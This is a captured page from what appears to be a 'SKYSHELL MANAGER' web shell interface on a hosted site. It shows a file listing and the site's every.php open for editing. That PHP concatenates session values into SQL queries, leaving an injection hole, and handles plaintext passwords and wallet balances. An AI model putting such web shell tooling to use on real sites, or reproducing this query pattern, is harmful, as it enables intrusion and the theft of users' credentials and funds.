📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chblogistics.com
/
8f313d
/
Name
Size
Permissions
Actions
📁
..
-
0555
🗑️
🔒
📄
error_log
22.06 KB
0644
🗑️
⬇️
✏️
🔒
📄
index.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
Editing: every.php
<?php include "chk.php"; include "connect_to_mysqli.php"; $code = $password="" ; $code = $_SESSION['user']; $password = $_SESSION['pass']; $ide = $_SESSION['ide']; $check = "select * from user where email = '".$code."' && pass = '".$password."'"; $query = mysqli_query($con,$check); if (mysqli_affected_rows($con) == 0) { echo "<div class='era'><center>Authentication failed</center><br><br>"; echo "<center><a href = 'index.php'><font color='red'>LOGIN AGAIN</font></a></center></div>"; } else { $sql = "SELECT * from user where email = '".$code."' "; $sql2 = mysqli_query($con,$sql); while($row = mysqli_fetch_array($sql2)) { $id = $row["s"]; $name = $row['first']; $name2= $row['last']; $email = $row['email']; $pass = $row['pass']; $mob = $row['phone']; $mem = $row['member']; $usid= $row['user']; $imageURL='upload/'.$row["file_name"]; } } $sql = "SELECT * from wallet where id='$usid'"; $sql2 = mysqli_query($con,$sql); while($row = mysqli_fetch_array($sql2)) { $owo= $row['amount']; } ?>
💾 Save Changes